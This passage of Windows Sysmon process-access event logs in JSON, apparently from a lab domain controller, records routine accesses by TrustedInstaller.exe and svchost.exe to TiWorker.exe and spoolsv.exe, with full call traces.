(rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:15.196","SourceProcessGUID":"{41C8662E-1F69-5F25-0000-0010EE870200}","SourceProcessId":"2964","SourceThreadId":"2980","SourceImage":"C:\\Windows\\servicing\\TrustedInstaller.exe","TargetProcessGUID":"{41C8662E-1F69-5F25-0000-0010018A0200}","TargetProcessId":"3016","TargetImage":"C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe","GrantedAccess":"0x100000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\System32\\combase.dll+669f8|C:\\Windows\\servicing\\TrustedInstaller.exe+43a2|C:\\Windows\\servicing\\TrustedInstaller.exe+1d1d|C:\\Windows\\servicing\\TrustedInstaller.exe+28c6|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2813,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:24.028\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001073B90200}\r\nTargetProcessId: 2900\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:24.028","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001073B90200}","TargetProcessId":"2900","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2814,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:24.028\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001073B90200}\r\nTargetProcessId: 2900\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:24.028","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001073B90200}","TargetProcessId":"2900","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2815,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:24.028\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001073B90200}\r\nTargetProcessId: 2900\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:24.028","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001073B90200}","TargetProcessId":"2900","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2816,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:24.028\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001073B90200}\r\nTargetProcessId: 2900\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+6988|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:24.028","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001073B90200}","TargetProcessId":"2900","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+6988|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2817,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:24.028\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001073B90200}\r\nTargetProcessId: 2900\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:24.028","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001073B90200}","TargetProcessId":"2900","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2818,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:24.028\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001073B90200}\r\nTargetProcessId: 2900\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:24.028","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001073B90200}","TargetProcessId":"2900","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2819,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:24.028\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001073B90200}\r\nTargetProcessId: 2900\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:24.028","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001073B90200}","TargetProcessId":"2900","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2820,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:24.028\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001073B90200}\r\nTargetProcessId: 2900\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+6988|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 